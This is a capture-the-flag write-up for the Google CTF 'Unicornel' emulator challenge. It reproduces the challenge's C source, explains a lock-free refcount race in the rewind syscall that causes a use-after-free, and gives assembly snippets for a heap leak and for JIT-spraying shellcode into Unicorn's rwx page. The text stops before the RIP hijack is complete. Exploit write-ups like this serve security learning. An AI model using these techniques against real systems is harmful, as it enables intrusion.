UNICORNEL



I took part in Google CTF as a member of the joint team Cold Fusion.

I overslept and joined late, but a teammate had already found the vulnerability, so I concentrated on how to exploit it, wrote the exploit, and solved the challenge.

Analysis

==== About ====

Unicornel is a multi-process, multi-architecture emulator server

with concurrency and system call support. All processes of any architecture

share the underlying kernel, and can interact with each other via

system calls and in particular a lightweight shared memory interface.

==== Starting processes ====

In order to start a new process, you must first send a unicornelf header,

which naturally bears no resemblance whatsoever to the actual ELF standard:

struct unicornelf {

uc_arch arch; //Desired unicorn-supported ISA

uc_mode mode; //Desired unicorn-supported mode

struct {

unsigned long va; //Virtual address to map

unsigned long length; //Length of memory to map

} maps[4]; //Up to 4 mappings supported

unsigned short code_length; //The length of the code to follow the unicornelf header

unsigned char num_maps; //The number of mappings initialized in the maps array

};

Following the unicornelf header should be <code length> bytes of assembled machine code

in the specified instruction set architecture.

NOTE: Any feedback about the unicornelf format should be submitted to:

https://docs.google.com/forms/d/e/1FAIpQLSck2N2w5J84iu7CKYlGkEmwn1Xsjtl5Jmlm_4t2DfC8vwNLOw/viewform?usp=sharing&resourcekey=0--aU-tRVYI9eI9UCRMuEMfQ

There MUST be at least one mapping specified - the first mapping ALWAYS stores the

uploaded machine code. Any unused maps array elements can be set to whatever values you want, and unicornelf will dutifully ignore them.

After receiving the unicornelf and <code length> bytes of machine code, the "process" will

be automatically started on a new POSIX thread. The lowest available pid is assigned to the process. Bear in mind that this pid is utterly unrelated to the actual Linux tid of the

thread.

==== Process Limitations ====

There can only be up to 8 processes at a time.

There can only be one process per architecture at a time. (e.g. you cannot have two x86 processes)

==== Process lifetime ====

Processes execute until one of the following conditions:

- The exit syscall is called by the process

- The process executes the last instruction in the uploaded assembly code

- The process encounters some exception condition

- The client connection to the Unicornel is terminated (all processes

unceremoniously terminate)

==== System Call conventions ====

The system call interface is invoked whenever an interrupt is generated by the uploaded

and executing machine code. System call arguments are passed in on all architectures via

registers. The system call number is always arg0 (e.g. rax on x86).

The remaining 3 arguments are used to pass whatever data is needed to the syscall.

The register to arguments mappings for all architectures is defined by the call_regs array. Each element index of the inner per-architecture array element corresponds to the given argument index:

static unsigned int call_regs[UC_ARCH_MAX][4] = {

{0,0,0,0}, //NONE

{UC_ARM_REG_R0,UC_ARM_REG_R1,UC_ARM_REG_R2,UC_ARM_REG_R3}, //UC_ARCH_ARM

{UC_ARM64_REG_X0,UC_ARM64_REG_X1,UC_ARM64_REG_X2,UC_ARM64_REG_X3}, //UC_ARCH_ARM64

{UC_MIPS_REG_A0,UC_MIPS_REG_A1,UC_MIPS_REG_A2,UC_MIPS_REG_A3}, //UC_ARCH_MIPS

{UC_X86_REG_RAX,UC_X86_REG_RBX,UC_X86_REG_RCX,UC_X86_REG_RDX}, //UC_ARCH_X86

{UC_PPC_REG_0,UC_PPC_REG_1,UC_PPC_REG_2,UC_PPC_REG_3}, //UC_ARCH_PPC

{UC_SPARC_REG_O0,UC_SPARC_REG_O1,UC_SPARC_REG_O2,UC_SPARC_REG_O3}, //UC_ARCH_SPARC

{UC_M68K_REG_D0,UC_M68K_REG_D1,UC_M68K_REG_D2,UC_M68K_REG_D3}, //UC_ARCH_M68K

{UC_RISCV_REG_A0,UC_RISCV_REG_A1,UC_RISCV_REG_A2,UC_RISCV_REG_A3}, //UC_ARCH_RISCV

{UC_S390X_REG_R0,UC_S390X_REG_R1,UC_S390X_REG_R2,UC_S390X_REG_R3}, //UC_ARCH_S390X

{UC_TRICORE_REG_D0,UC_TRICORE_REG_D1,UC_TRICORE_REG_D2,UC_TRICORE_REG_D3}, //UC_ARCH_TRICORE

};

E.g. for an X86 process to call unicornel_write, you would set rax to 1 (the unicornel write syscall number), rbx to the location of the buffer to write, and rcx to the number of bytes to write.

==== Supported system calls ====

There are 11 supported system calls:

Syscall Name #

unicornel_exit 0

unicornel_write 1

print_integer 2

create_shared 3

map_shared 4

unmap_shared 5

bookmark 6

unicornel_rewind 7

switch_arch 8

unicornel_pause 9

unicornel_resume 10

void unicornel_exit();

Terminates the calling process

This function never returns

long unicornel_write(void* buf, size_t count);

Write up to count bytes from the buffer at buf to the unicornel client (eventually sent over the socket).

Returns the number of bytes written, or an error code if there was a failure.

void-ish print_integer(long integer);

Write the argument as an ASCII base-10 integer to the unicornel client.

Always returns 0.

long create_shared(unsigned long length);

Creates a new shared memory buffer of the specified length

Returns a handle to the buffer to be used with map_shared later, or an error code.

long map_shared(void* addr,unsigned long length, unsigned long handle);

Map a shared buffer previously created with create_shared at the address addr.

Lengths less than the size of the shared buffer are ok.

Returns 0 on success, or an error code.

NOTE:

A process can only have one shared buffer mapped at a time, but multiple processes can map the same shared buffer at the same time.

long unmap_shared();

Unmaps a previously mapped shared buffer

Returns 0 on success or an error code

WARNING:

If this was the last mapping of the shared buffer, the shared buffer will be destroyed

and the handle released to be used for new created shared buffers

long bookmark();

Bookmark the current processor state to return to later with rewind().

Returns 0 on success or an error code.

NOTE:

You can only have one bookmark at a time.

Once a bookmark is created, it cannot be destroyed or reset except by

switching architectures. You can rewind to the same bookmark multiple times.

long unicornel_rewind();

Rewind the processor to the state previously saved by bookmark().

Returns 0 on success or an error code.

NOTE:

This does not rewind writes to memory, but will rewind (and unmap) shared

buffers that were mapped since the bookmark'd processor state.

WARNING:

While shared buffer mappings can be rewound, shared buffer *unmappings* cannot be in order

to avoid potential UAF issues. This feature may be added in future versions....

void switch_arch(uc_arch arch, uc_mode mode, void* new_pc);

Switch the instruction set architecture used by this process, and long jump to new_pc

Mappings (including shared mappings) and memory contents are preserved across the switch.

CPU State (including registers and bookmarks) are discarded.

Ensure any desired state to pass across the ISA barrier is saved to memory beforehand.

This system call does not (really) "return", and no return value is specified.

NOTE:

In order to prevent the numerous developer headaches that would otherwise result, a process

can only transition architectures once in its lifetime.

WARNING:

Any shared buffer mappings have an additional refcount "zombified".

This additional reference will be destroyed when the process exits. This means that a

shared buffer may not be mapped anywhere, and yet still exist and be mappable. This is

not considered a bug, but it's not really a feature either.

void-ish unicornel_pause();

Pause the current process until another process calls unicornel_resume() with the

appropriate pid

This system call always succeeds, and always returns 0.

long unicornel_resume(unsigned long pid)

Resume the process specified by pid.

Returns 0 on success, or an error code.

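The challenge starts by handing you the docs above.

What you get is a multi-architecture, multi-process emulator.

The processes run in parallel, and each process can have at most one shared memory region mapped for IPC.

The full source code was provided as well, so the analysis itself was quite easy.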

int main(int argc, char *argv[]) {

pfds[MAX_PROCESSES].fd = 0 /* stdin */;

pfds[MAX_PROCESSES].events = POLLIN;

pfds[MAX_PROCESSES].revents = 0;

for(unsigned int i = 0; i < MAX_PROCESSES; i++) {

pfds[i].fd = -1;

pfds[i].events = POLLIN;

pfds[i].revents = 0;

}

printf("Welcome to the unicornel!\n");

fflush(stdout);

pthread_mutex_init(&task_lock,NULL);

while(1) {

poll(pfds,MAX_PROCESSES + 1,-1);

for(unsigned i = 0; i < MAX_PROCESSES; i++) {

//Data available from emulated process

if(pfds[i].revents & POLLIN) {

int nbytes;

ioctl(pfds[i].fd,FIONREAD,&nbytes);

splice(pfds[i].fd,0,1 /* stdout */,0,nbytes,0);

}

//Process ended, and the write end of the pipe was closed in destroy_process. Finish cleanup

if(pfds[i].revents & POLLHUP) {

close(pfds[i].fd);

pfds[i].fd = -1;

}

}

if(pfds[MAX_PROCESSES].revents & POLLIN) {

//Received new process data

start_process();

fflush(stdout);

}

}

return 0;

}

main simply polls stdin, receives a program in the custom ELF format, and runs it.

int start_process()

{

pthread_mutex_lock(&task_lock);

int pid = find_free_process();

if(pid < 0)

{

printf("At max processes already\n");

pthread_mutex_unlock(&task_lock);

return -1;

}

struct unicornelf process_data;

//Signal to client that we're ready to receive process_data

printf("DATA_START\n");

int ret = read(0,&process_data,sizeof(process_data));

if(ret != sizeof(process_data)) {

printf("Unexpected read size\n");

pthread_mutex_unlock(&task_lock);

return -1;

}

if(!process_data.code_length || !process_data.num_maps || process_data.num_maps > 4 || process_data.code_length > process_data.maps[0].length)

{

printf("Malformed process data\n");

pthread_mutex_unlock(&task_lock);

return -1;

}

//Only allow one process per architecture

if(process_data.arch >= UC_ARCH_MAX || process_data.arch < 1 || arch_used[process_data.arch])

{

printf("Invalid arch specified\n");

pthread_mutex_unlock(&task_lock);

return -1;

}

char* code_recv = calloc(1,process_data.code_length);

//Signal to client that we're ready to receive process code

printf("CODE_START\n");

fflush(stdout);

read(0,code_recv,process_data.code_length);

uc_engine *uc;

uc_err err;

err = uc_open(process_data.arch,process_data.mode,&uc);

if(err != UC_ERR_OK) {

printf("Failed on uc_open() %u %u with error %u\n",process_data.arch,process_data.mode,err);

pthread_mutex_unlock(&task_lock);

free(code_recv);

return -1;

}

for(unsigned i = 0; i < process_data.num_maps; i++)

{

err = uc_mem_map(uc,process_data.maps[i].va,process_data.maps[i].length,UC_PROT_ALL);

if(err != UC_ERR_OK)

{

printf("Failed on uc_mem_map() with error %u\n",err);

free(code_recv);

uc_close(uc);

pthread_mutex_unlock(&task_lock);

return -1;

}

}

err = uc_mem_write(uc,process_data.maps[0].va,code_recv,process_data.code_length);

free(code_recv);

if(err != UC_ERR_OK)

{

printf("failed on uc_mem_write() with error %u\n",err);

uc_close(uc);

pthread_mutex_unlock(&task_lock);

return -1;

}

uc_hook trace;

int pipefds[2];

pipe(pipefds);

pfds[pid].fd = pipefds[0];

pfds[pid].events = POLLIN;

pfds[pid].revents = 0;

struct process* new_process = calloc(1,sizeof(struct process));

new_process->pid = pid;

new_process->outfd = pipefds[1];

new_process->uc = uc;

new_process->arch = process_data.arch;

new_process->entrypoint = process_data.maps[0].va;

new_process->code_length = process_data.code_length;

new_process->bookmark = NULL;

new_process->sbr.va = 0;

new_process->sbr.unmap_on_rewind = false;

new_process->transition = false;

memcpy(new_process->maps,process_data.maps,sizeof(process_data.maps));

new_process->num_maps = process_data.num_maps;

processes[pid] = new_process;

err = uc_hook_add(uc,&trace,UC_HOOK_INTR,hook_call,new_process,1,0);

if(err != UC_ERR_OK)

{

printf("failed on uc_hook_add() with error %u\n",err);

destroy_process(new_process);

pthread_mutex_unlock(&task_lock);

return -1;

}

pthread_attr_t attr;

pthread_attr_init(&attr);

pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);

int pthread_err = pthread_create(&new_process->thread,&attr,process_thread,new_process);

if(pthread_err != 0)

{

printf("failed to create pthread\n");

destroy_process(new_process);

}

else {

printf("new process created with pid %d\n",pid);

arch_used[process_data.arch] = true;

}

pthread_mutex_unlock(&task_lock);

return pthread_err;

}

This is where each process is started on its own thread so that the processes run in parallel.

struct unicornelf {

uc_arch arch;

uc_mode mode;

struct {

unsigned long va;

unsigned long length;

} maps[4];

unsigned short code_length;

unsigned char num_maps;

};

struct buffer_ref {

unsigned long va;

unsigned long length;

unsigned handle;

bool unmap_on_rewind;

};

struct process {

pthread_t thread;

uc_arch arch;

int outfd;

uc_engine *uc;

unsigned long entrypoint;

uc_context* bookmark;

struct buffer_ref sbr;

struct {

unsigned long va;

unsigned long length;

} maps[4];

unsigned short code_length;

unsigned char pid;

unsigned char num_maps;

bool transition;

bool paused;

};

struct shared_buffer {

volatile atomic_uint refs;

void* buffer;

unsigned length;

};

static unsigned int call_regs[UC_ARCH_MAX][4] = {

{0,0,0,0}, //NONE

{UC_ARM_REG_R0,UC_ARM_REG_R1,UC_ARM_REG_R2,UC_ARM_REG_R3}, //UC_ARCH_ARM

{UC_ARM64_REG_X0,UC_ARM64_REG_X1,UC_ARM64_REG_X2,UC_ARM64_REG_X3}, //UC_ARCH_ARM64

{UC_MIPS_REG_A0,UC_MIPS_REG_A1,UC_MIPS_REG_A2,UC_MIPS_REG_A3}, //UC_ARCH_MIPS

{UC_X86_REG_RAX,UC_X86_REG_RBX,UC_X86_REG_RCX,UC_X86_REG_RDX}, //UC_ARCH_X86

{UC_PPC_REG_0,UC_PPC_REG_1,UC_PPC_REG_2,UC_PPC_REG_3}, //UC_ARCH_PPC

{UC_SPARC_REG_O0,UC_SPARC_REG_O1,UC_SPARC_REG_O2,UC_SPARC_REG_O3}, //UC_ARCH_SPARC

{UC_M68K_REG_D0,UC_M68K_REG_D1,UC_M68K_REG_D2,UC_M68K_REG_D3}, //UC_ARCH_M68K

{UC_RISCV_REG_A0,UC_RISCV_REG_A1,UC_RISCV_REG_A2,UC_RISCV_REG_A3}, //UC_ARCH_RISCV

{UC_S390X_REG_R0,UC_S390X_REG_R1,UC_S390X_REG_R2,UC_S390X_REG_R3}, //UC_ARCH_S390X

{UC_TRICORE_REG_D0,UC_TRICORE_REG_D1,UC_TRICORE_REG_D2,UC_TRICORE_REG_D3}, //UC_ARCH_TRICORE

};

static unsigned int ip_reg[UC_ARCH_MAX] = {

0,

UC_ARM_REG_PC,

UC_ARM64_REG_PC,

UC_MIPS_REG_PC,

UC_X86_REG_RIP,

UC_PPC_REG_PC,

UC_SPARC_REG_PC,

UC_M68K_REG_PC,

UC_RISCV_REG_PC,

UC_S390X_REG_PC,

UC_TRICORE_REG_PC

};

Several architectures are supported.

The core data structures are laid out as shown above.
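To make the wire format concrete, here is a minimal sketch of packing the `unicornelf` header with Python's `struct` module. It assumes the usual x86-64 layout, where `uc_arch` and `uc_mode` are 4-byte enums and the struct is padded to 80 bytes, which matches the five trailing zero bytes the exploit sends. `pack_unicornelf` is a hypothetical helper name, and its checks only mirror the sanity checks in `start_process`.

```python
import struct

MAX_MAPS = 4
# arch, mode (assumed 4-byte enums), 4 x (va, length), code_length, num_maps, 5 pad bytes
HEADER_FMT = "<II" + "QQ" * MAX_MAPS + "HB5x"

def pack_unicornelf(arch, mode, maps, code_length):
    """Pack a unicornelf header (hypothetical helper; the layout is an assumption)."""
    if not 1 <= len(maps) <= MAX_MAPS:
        raise ValueError("need between 1 and 4 mappings")
    if code_length == 0 or code_length > maps[0][1]:
        raise ValueError("code must be non-empty and fit in the first mapping")
    # Unused map slots are ignored by the server, so zero-fill them.
    padded = list(maps) + [(0, 0)] * (MAX_MAPS - len(maps))
    flat = [field for entry in padded for field in entry]
    return struct.pack(HEADER_FMT, arch, mode, *flat, code_length, len(maps))

# UC_ARCH_X86 = 4, UC_MODE_64 = 1 << 3, two mappings, 0x40 bytes of code
header = pack_unicornelf(4, 1 << 3, [(0x1000, 0x1000), (0x2000, 0x1000)], 0x40)
print(len(header))
```

The code bytes themselves are sent separately, after the server prints `CODE_START`.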

long (*syscalls[])(struct process* current) = {

unicornel_exit,

unicornel_write,

print_integer,

create_shared,

map_shared,

unmap_shared,

bookmark,

unicornel_rewind,

switch_arch,

unicornel_pause,

unicornel_resume

};

Only a handful of system calls are implemented.

All of them live in syscalls.c.
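Since the calling convention is just "syscall number in arg0, up to three arguments in the next registers, then raise an interrupt", the per-architecture assembly can be generated from a table. The sketch below covers only the three architectures used in this write-up. `syscall_asm` is a hypothetical helper, the register names come from `call_regs`, and the trap instructions (`int 0x80`, `svc 0`) are the ones the exploit helpers use.

```python
# Argument registers per architecture, copied from the call_regs table.
CALL_REGS = {
    "x86": ("rax", "rbx", "rcx", "rdx"),
    "arm": ("r0", "r1", "r2", "r3"),
    "arm64": ("x0", "x1", "x2", "x3"),
}
# Instruction that raises the interrupt handled by hook_call.
TRAP = {"x86": "int 0x80", "arm": "svc 0", "arm64": "svc 0"}

def syscall_asm(arch, number, *args):
    """Return assembly text for one unicornel syscall (hypothetical helper)."""
    if len(args) > 3:
        raise ValueError("at most 3 arguments besides the syscall number")
    regs = CALL_REGS[arch]
    prefix = "" if arch == "x86" else "#"  # ARM-style immediates take a '#'
    lines = [f"mov {reg}, {prefix}{value}" for reg, value in zip(regs, (number, *args))]
    lines.append(TRAP[arch])
    return "\n".join(lines) + "\n"

print(syscall_asm("x86", 1, 0x3000, 0x20))  # unicornel_write(0x3000, 0x20)
```

One caveat: on ARM not every constant fits in a `mov` immediate, so larger values may need an `ldr rN, =value` literal load instead, as the exploit does for addresses.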

long unicornel_pause(struct process* current) {

current->paused = true;

while(current->paused);

return 0;

}

long unicornel_resume(struct process* current) {

unsigned long pid = ARG_REGR(current,1);

pthread_mutex_lock(&task_lock);

if(pid > MAX_PROCESSES || !processes[pid] || !processes[pid]->paused)

{

pthread_mutex_unlock(&task_lock);

return -1;

}

processes[pid]->paused = false;

pthread_mutex_unlock(&task_lock);

return 0;

}

pause suspends the calling process by spinning on its paused flag, and resume wakes up another process by clearing that flag.

long switch_arch(struct process* current) {

//Only allow switching architectures once in order to avoid potential recursion stack overflows

if(current->transition)

return -1;

uc_arch arch = ARG_REGR(current,1);

uc_mode mode = ARG_REGR(current,2);

unsigned long new_pc = ARG_REGR(current,3);

if(!uc_arch_supported(arch) || arch_used[arch]) {

return -2;

}

uc_engine* new_uc;

uc_engine* og_uc = current->uc;

uc_arch og_arch = current->arch;

struct buffer_ref og_sbr = current->sbr;

uc_err e = uc_open(arch,mode,&new_uc);

if(e != UC_ERR_OK) {

return -3;

}

//Add in the hook so syscalls are supported

uc_hook trace;

e = uc_hook_add(new_uc,&trace,UC_HOOK_INTR,hook_call,current,1,0);

if(e != UC_ERR_OK)

{

uc_close(new_uc);

return -5;

}

//Transition maps

for(unsigned i = 0; i < current->num_maps; i++)

{

e = uc_mem_map(new_uc,current->maps[i].va,current->maps[i].length,UC_PROT_ALL);

if(e != UC_ERR_OK)

{

uc_close(new_uc);

return -4;

}

//Transition the memory across to the new uc

char* transition_buffer = malloc(current->maps[i].length);

if(!transition_buffer) {

uc_close(new_uc);

return -4;

}

uc_mem_read(current->uc,current->maps[i].va,transition_buffer,current->maps[i].length);

uc_mem_write(new_uc,current->maps[i].va,transition_buffer,current->maps[i].length);

free(transition_buffer);

}

//Including shared regions

if(og_sbr.va)

{

uc_mem_map_ptr(new_uc,og_sbr.va,og_sbr.length,UC_PROT_ALL,shared_buffers[og_sbr.handle].buffer);

//Transitioning architectures means there's now two references to the shared buffer - the original arch ref and the new arch ref

shared_buffers[og_sbr.handle].refs++;

current->sbr.unmap_on_rewind = false;

}

//Destroy bookmark, because we can't rewind through architectures anyway

uc_context_free(current->bookmark);

current->bookmark = NULL;

//Complete transition

current->uc = new_uc;

current->arch = arch;

arch_used[arch] = true;

arch_used[og_arch] = false;

current->transition = true;

uc_emu_start(new_uc,new_pc,0,0,0);

//Detransition, destorying the new state and restoring the old state so destroy_process can clean up

current->uc = og_uc;

pthread_mutex_lock(&task_lock);

if(current->sbr.va)

{

shared_buffers[current->sbr.handle].refs--;

if(shared_buffers[current->sbr.handle].refs == 1)

{

//last reference, destroy it

free(shared_buffers[current->sbr.handle].buffer);

shared_buffers[current->sbr.handle].refs--;

}

}

//Restore sbr, only for it to be freed in destroy_process

current->sbr = og_sbr;

arch_used[arch] = false;

pthread_mutex_unlock(&task_lock);

uc_close(new_uc);

uc_emu_stop(og_uc);

return 0;

}

Switching architectures at runtime is supported.

long bookmark(struct process* current) {

if(current->bookmark) {

return -1;

}

uc_err e = uc_context_alloc(current->uc,&current->bookmark);

if(e == UC_ERR_OK)

e = uc_context_save(current->uc,current->bookmark);

return e;

}

long unicornel_rewind(struct process* current) {

if(current->bookmark == NULL)

{

return -1;

}

uc_err e = uc_context_restore(current->uc,current->bookmark);

if(e != UC_ERR_OK)

{

//Couldn't rewind so just fail out

return -2;

}

/* If we bookmarked, then mapped a shared buffer, we need to unmap the shared buffer to

* restore the original state properly.

* We can skip a full unmap_shared call because we do the checking here directly.

*/

if(current->sbr.va && current->sbr.unmap_on_rewind)

{

uc_err e = uc_mem_unmap(current->uc,current->sbr.va,current->sbr.length);

if(e == UC_ERR_OK)

{

shared_buffers[current->sbr.handle].refs--;

}

current->sbr.va = 0;

current->sbr.unmap_on_rewind = false;

if(shared_buffers[current->sbr.handle].refs == 1)

{

//last reference, destroy it

free(shared_buffers[current->sbr.handle].buffer);

shared_buffers[current->sbr.handle].refs--;

}

}

return 0;

}



bookmark and rewind are the system calls that save the current CPU context and later restore it.

struct shared_buffer shared_buffers[MAX_PROCESSES] = { 0 };

long create_shared(struct process* current) {

pthread_mutex_lock(&task_lock);

unsigned long length = ARG_REGR(current,1);

if(length > 0x10000 || !length || length & 0xFFF)

{

pthread_mutex_unlock(&task_lock);

return -1;

}

//Find an empty shared buffer handle

unsigned long handle;

for(handle = 0; handle < MAX_PROCESSES; handle++) {

if(!shared_buffers[handle].refs)

break;

}

if(handle == MAX_PROCESSES) {

pthread_mutex_unlock(&task_lock);

return -2;

}

void* buffer = calloc(1,length);

if(!buffer) {

pthread_mutex_unlock(&task_lock);

return -3;

}

shared_buffers[handle].refs = 1; //Set to 1 to give a chance to map it

shared_buffers[handle].buffer = buffer;

shared_buffers[handle].length = length;

pthread_mutex_unlock(&task_lock);

return handle;

}

long map_shared(struct process* current)

{

if(current->sbr.va) {

return -1;

}

pthread_mutex_lock(&task_lock);

unsigned long handle = ARG_REGR(current,3);

if(handle >= MAX_PROCESSES || !shared_buffers[handle].refs) {

pthread_mutex_unlock(&task_lock);

return -2;

}

unsigned long length = ARG_REGR(current,2);

if(!length || length & 0xFFF || length > shared_buffers[handle].length) {

pthread_mutex_unlock(&task_lock);

return -3;

}

unsigned long addr = ARG_REGR(current,1);

if(!addr|| addr & 0xFFF)

{

pthread_mutex_unlock(&task_lock);

return -4;

}

uc_err e = uc_mem_map_ptr(current->uc,addr, length,UC_PROT_ALL,shared_buffers[handle].buffer);

if(e == UC_ERR_OK)

{

shared_buffers[handle].refs++;

current->sbr.handle = handle;

current->sbr.length = length;

current->sbr.va = addr;

if(current->bookmark)

{

//We need to unmap the shared mapping on rewind if we bookmarked previously

current->sbr.unmap_on_rewind = true;

}

}

pthread_mutex_unlock(&task_lock);

return e;

}

//The bottom reference is only ever released by destroy_shared. Any maps will increase refcount to > 1

long unmap_shared(struct process* current) {

if(!current->sbr.va)

{

return -1;

}

pthread_mutex_lock(&task_lock);

uc_err e = uc_mem_unmap(current->uc,current->sbr.va,current->sbr.length);

if(e == UC_ERR_OK)

{

shared_buffers[current->sbr.handle].refs--;

current->sbr.va = 0;

current->sbr.unmap_on_rewind = false;

}

if(shared_buffers[current->sbr.handle].refs == 1)

{

//last reference, destroy it

free(shared_buffers[current->sbr.handle].buffer);

shared_buffers[current->sbr.handle].refs--;

}

pthread_mutex_unlock(&task_lock);

return e;

}

System calls for creating, mapping, and unmapping shared memory are implemented as well.

The rest are the plain write system call and other output-related system calls.

Vulnerability



long unicornel_rewind(struct process* current) {

if(current->bookmark == NULL)

{

return -1;

}

uc_err e = uc_context_restore(current->uc,current->bookmark);

if(e != UC_ERR_OK)

{

//Couldn't rewind so just fail out

return -2;

}

/* If we bookmarked, then mapped a shared buffer, we need to unmap the shared buffer to

* restore the original state properly.

* We can skip a full unmap_shared call because we do the checking here directly.

*/

if(current->sbr.va && current->sbr.unmap_on_rewind)

{

uc_err e = uc_mem_unmap(current->uc,current->sbr.va,current->sbr.length);

if(e == UC_ERR_OK)

{

shared_buffers[current->sbr.handle].refs--;

}

current->sbr.va = 0;

current->sbr.unmap_on_rewind = false;

if(shared_buffers[current->sbr.handle].refs == 1)

{

//last reference, destroy it

free(shared_buffers[current->sbr.handle].buffer);

shared_buffers[current->sbr.handle].refs--;

}

}

return 0;

}

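rewind never takes task_lock. So even though map, unmap, and the other syscalls lock around their accesses to the shared state, a race is still possible, and in certain cases it can be escalated to a memory corruption bug.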

Exploit



The approach I came up with for exploiting the race was to overlap a rewind syscall with a map.

If it succeeds, we get a UAF.

pid 0 : save ctx -> pause -> map shared -> resume 1 -> rewind

pid 1 : create shared -> resume 0 -> pause -> map shared

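In practice, pausing and resuming the processes like this lets rewind and map shared overlap as closely as possible.

The shared memory has to be mapped after the bookmark and before the rewind; only then is the unmap_on_rewind flag set, so that rewind performs the unmap internally.

Assuming the flag is set, the internal behavior can be summarized as follows.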

[MAP]

1) if refs != 0 -> cont

2) map_internal()

3) refs += 1

[REWIND]

1) refs -= 1

2) if refs == 1 -> cont

3) free mem

4) refs -= 1

pid 0 : map -> ref count = 2

pid 0 : rewind - (1) -> ref count = 1

pid 0 : rewind - (3) -> memory free

pid 1 : map - (1) -> ref count = 1, condition bypassed

As long as this order holds, the result is a memory bug no matter how the ref count is updated afterwards.
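The interleaving above can be replayed deterministically on a toy model of the refcount. This is only a sketch: `SharedBuffer` and `replay_winning_interleaving` are hypothetical names, the real race depends on thread timing, and the model tracks nothing but `refs` and whether the buffer has been freed.

```python
from dataclasses import dataclass

@dataclass
class SharedBuffer:
    refs: int = 0
    freed: bool = False

def replay_winning_interleaving():
    """Replay the winning schedule step by step on a toy refcount model."""
    buf = SharedBuffer(refs=1)   # create_shared leaves the base reference
    buf.refs += 1                # pid 0: map_shared after bookmark -> refs == 2

    buf.refs -= 1                # pid 0: rewind (1), no lock held -> refs == 1
    if buf.refs == 1:            # pid 0: rewind (2)
        buf.freed = True         # pid 0: rewind (3), free(buffer)

    # pid 1: map_shared runs its check before rewind (4) has executed
    check_passed = buf.refs != 0
    mapped_freed_memory = check_passed and buf.freed

    buf.refs -= 1                # pid 0: rewind (4) -> refs == 0
    if check_passed:
        buf.refs += 1            # pid 1: map_shared takes its reference
    return mapped_freed_memory, buf.refs

print(replay_winning_interleaving())
```

In this model pid 1 ends up holding a mapping of an already freed buffer while `refs` looks perfectly healthy, which is the UAF the exploit relies on.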

With code written for this scenario, winning the race exposes the fd pointer of a freed chunk in that thread's heap, which leaks a thread heap address.

# pid 1

code = ''

code += 'mov rsp, 0x2000\n'

code += 'retry:\n'

code += create_shared_x86(0x1000)

code += resume_x86(0)

code += pause_x86()

code += map_shared_x86(0x5000, 0x1000, 0) # handle 0

code += '''\

mov rdi, 0x5000

mov rax, [rdi]

cmp rax, 0

jne success

'''

Adding a check like the one above tells us whether the race was won or lost, which makes the memory leak reliable.



The memory layout looks like the above. It contains a JIT page mapped rwx, and that JIT page appears to have its own randomization applied. I decided to target the JIT page to get RCE.

Initial Attempt

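The first scenario I tried was the following.

Once the thread heap address has been leaked through the UAF in the thread heap, the JIT page turns out to have less entropy than expected. The exact base cannot be leaked, but an address inside the rwx page can be guessed probabilistically.

Attacking this way means corrupting fd through the UAF, turning that into an AAW via tcache, getting a chunk allocated on the JIT page, and writing malicious shellcode into it.

If the user could allocate memory at will, later allocations would reclaim parts of the freed memory, so tampering with fd would poison the free list.

That scenario only works if the user can allocate freely, and by normal means it was not possible to make two or more allocations in a row.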

Final Exploit Scenario

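So I decided to come up with a different scenario.

I started from the following hypothesis.

The presence of a JIT page means that, as an internal optimization, part of the emulated code is translated to machine code by a JIT.

I did not know exactly what triggers the JIT compilation, but I assumed that, as is typical, it is driven by something like a call count, so running the same code over and over should trigger it.

I figured this would let user input end up in the JIT page: use a constant-load instruction available on some architecture to plant pieces of shellcode in the rwx memory, then hijack rip to pop a shell.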

x86_code = write_x86(0x3000, 0x20)

x86_code += resume_x86(2)

x86_code += '''\

mov rdi, 0x200

call go

go:

movq r10, 0xdeadbeefdeadbeef

movq r10, 0xdeadbeefdeadbeef

sub rdi, 1

cmp rdi, 0

je out

jmp go

out:

ret

'''



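When I deliberately got the code optimized this way, the engine appeared to perform something like dead code elimination internally.

Only the last assignment to r10 was translated to machine code, and I confirmed that 0xdeadbeefdeadbeef ended up in the JIT page.

On the other architectures the optimized code could not place a full 8 bytes in the JIT page, so the optimization has to be triggered on x86_64.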
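Because each constant load carries exactly 8 attacker-chosen bytes, the shellcode has to be cut into 8-byte pieces that hop from one immediate to the next. The sketch below decodes the `shellcode` list from the exploit script back into bytes. The values are copied from that script, `to_chunks` is a hypothetical helper, and how far apart the immediates actually land in the JIT page is not modeled here.

```python
import struct

# Values copied from the exploit's `shellcode` list.
SHELLCODE_QWORDS = [
    498588942530195304,
    498591614015516520,
    498762874620002632,
    498581047463641416,
    364607107060173128,
]

def to_chunks(qwords):
    """Turn each 64-bit immediate into the 8 little-endian bytes the JIT emits."""
    return [struct.pack("<Q", q) for q in qwords]

chunks = to_chunks(SHELLCODE_QWORDS)
for chunk in chunks:
    print(chunk.hex())
```

The first four chunks end in `eb 06`, a short jump equivalent to the `jmp $+0x8` in the commented-out assembly, and the last one ends in `0f 05`, the `syscall` instruction.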

For this scenario to work, the following preconditions must hold.

- The JIT base must be computable exactly, i.e., a primitive that leaks a JIT page address precisely is needed.

- An RIP hijacking primitive is needed.

JIT base leak

If an allocation of the right size in the thread heap reclaims an already freed chunk that holds a pointer into the JIT region, we get a working leak primitive.

Under certain conditions I was able to leak JIT base + 0x720.
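The leak handling boils down to slicing a few qwords out of the dumped chunk. Here is a minimal sketch of that step, using the offsets from the exploit script (0x720 and 0x1e820). `parse_leak` is a hypothetical helper, and which qword holds which pointer is taken from how the script indexes the dump, not from any documented layout.

```python
import struct

JIT_LEAK_OFFSET = 0x720       # leaked pointer = JIT base + 0x720
HEAP_TARGET_DELTA = 0x1e820   # delta the exploit adds to the leaked heap pointer

def parse_leak(data):
    """Extract the values the exploit needs from the dumped chunk (hypothetical helper)."""
    if len(data) < 0x18:
        raise ValueError("need at least 0x18 bytes of leaked data")
    # qword 0: pointer into the JIT page, qword 2: thread heap pointer
    jit_ptr, _, thread_heap = struct.unpack_from("<QQQ", data, 0)
    return {
        "jit_base": jit_ptr - JIT_LEAK_OFFSET,
        "thread_heap": thread_heap,
        "heap_target": thread_heap + HEAP_TARGET_DELTA,
    }

# Made-up addresses, only to show the arithmetic.
sample = struct.pack("<QQQ", 0x7F0000000720, 0, 0x7F1000000000) + bytes(0x28)
print({name: hex(value) for name, value in parse_leak(sample).items()})
```

The exploit reads the same location twice and retries the whole attempt if the two JIT values disagree, which filters out runs where the reclaimed chunk did not contain the expected pointer.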

Hijacking RIP

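I had to find one more exploitable point that is reachable through something the user controls.

The reason is that there must be an allocation inside the thread where the memory bug occurred; only then is there an object that can be targeted and tampered with.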



